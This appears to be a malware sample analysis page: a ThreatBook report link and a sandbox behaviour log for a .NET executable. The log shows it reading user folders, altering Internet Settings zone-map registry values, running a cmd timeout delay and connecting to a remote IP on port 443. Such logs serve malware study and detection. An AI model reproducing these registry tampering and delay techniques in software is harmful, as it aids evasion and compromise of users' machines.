样本分析 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb

 

https://s.threatbook.com/report/file/99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb

 

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
09:07:41:671,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_create,    C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,  parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' image_base:0x0000000000610000 image_size:0x0000A000 ,   0x00000000 [操作成功完成。  ],
09:07:41:686,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\Framework, filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00000FFF ,  0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll.aux,   offset:0x00000000 datalen:0x000000B0 ,  0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,   base:0x0000000071D60000 size:0x0140E000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00000FFF ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll.aux,   offset:0x00000000 datalen:0x0000026C ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,   base:0x0000000071270000 size:0x00A55000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll.aux,   offset:0x00000000 datalen:0x00000360 ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll.aux, offset:0x00000000 datalen:0x00000384 ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000070A50000 size:0x00818000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,   base:0x0000000070940000 size:0x00106000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll.aux,   offset:0x00000000 datalen:0x000002EC ,  0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,   base:0x000000006E430000 size:0x00774000 ,   0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00000FFF ,  0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00001000 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:796,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Desktop\desktop.ini,   offset:0x00000000 datalen:0x0000011C ,  0x00000000 [操作成功完成。  ],
09:07:41:796,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Documents\desktop.ini, offset:0x00000000 datalen:0x00000194 ,  0x00000000 [操作成功完成。  ],
09:07:41:796,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Music\desktop.ini, offset:0x00000000 datalen:0x000001FA ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Pictures\desktop.ini,  offset:0x00000000 datalen:0x000001FA ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Videos\desktop.ini,    offset:0x00000000 datalen:0x000001FA ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Downloads\desktop.ini, offset:0x00000000 datalen:0x0000011C ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\OneDrive\desktop.ini,  offset:0x00000000 datalen:0x00000064 ,  0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,   type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,  type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,    type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,   type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,  type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,    type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:858,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Windows\SysWOW64\cmd.exe,    offset:0x00000000 datalen:0x00039A00 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   PROC_exec,  C:\Windows\SysWOW64\cmd.exe,    target_pid:6308 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:0, 4092,   EXEC_create,    C:\Windows\SysWOW64\cmd.exe,    parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:5100,  4092,   FILE_read,  C:\Windows\System32\conhost.exe,    offset:0x00000000 datalen:0x000C8C00 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:0, 4092,   PROC_exec,  C:\Windows\System32\conhost.exe,    target_pid:6580 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:5100,  4092,   REG_setval, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'C9 2F 5F 60 DE DA D9 01 00 00 00 00 00 00 00 00 ' ,    0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:0, 4092,   EXEC_create,    C:\Windows\System32\conhost.exe,    parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6131A0000 image_size:0x000D1000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:5780,  4092,   FILE_read,  C:\Windows\Prefetch\CONHOST.EXE-0C6456FB.pf,    offset:0x00000000 datalen:0x00001E40 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\ntdll.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\conhost.exe,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\kernel32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\KernelBase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\locale.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\msvcp_win.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\ucrtbase.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\SHCore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\msvcrt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\rpcrt4.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\combase.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\bcryptprimitives.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\advapi32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\sechost.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\win32u.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\gdi32.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\gdi32full.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\imm32.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\Conhost.exe.mui,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\shell32.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\cfgmgr32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\windows.storage.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\profapi.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\powrprof.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\shlwapi.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\kernel.appcore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\cryptsp.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\Globalization\Sorting\SortDefault.nls,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\user32.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\msctf.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\oleaut32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\ole32.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:921,   conhost.exe,    6580:7656,  4092,   FILE_read,  C:\Windows\Fonts\StaticCache.dat,   offset:0x00000000 datalen:0x0000003C ,  0x00000000 [操作成功完成。  ],
09:07:41:936,   conhost.exe,    6580:0, 4092,   EXEC_module_load,   C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll,    base:0x00007FFA14440000 size:0x00279000 ,   0x00000000 [操作成功完成。  ],
09:07:41:936,   cmd.exe,    6308:5100,  4092,   FILE_read,  C:\Windows\SysWOW64\timeout.exe,    offset:0x00000000 datalen:0x00006200 ,  0x00000000 [操作成功完成。  ],
09:07:41:936,   cmd.exe,    6308:0, 4092,   PROC_exec,  C:\Windows\SysWOW64\timeout.exe,    target_pid:8672 cmdline:'timeout  4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:952,   timeout.exe,    8672:0, 4092,   EXEC_create,    C:\Windows\SysWOW64\timeout.exe,    parent_pid:6308 cmdline:'timeout  4.769' image_base:0x0000000000020000 image_size:0x0000A000 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   timeout.exe,    8672:0, 4092,   EXEC_destroy,   C:\Windows\SysWOW64\timeout.exe,    parent_pid:6308 cmdline:'timeout  4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   cmd.exe,    6308:0, 4092,   EXEC_destroy,   C:\Windows\SysWOW64\cmd.exe,    parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   conhost.exe,    6580:0, 4092,   EXEC_destroy,   C:\Windows\System32\conhost.exe,    parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:42:046,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll, base:0x000000006FF10000 size:0x0008E000 ,   0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,   filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,   filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
09:07:42:608,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   NET_connect,    104.18.19.73:443,   protocol:(TCP)0 ,   0x00000000 [操作成功完成。  ],
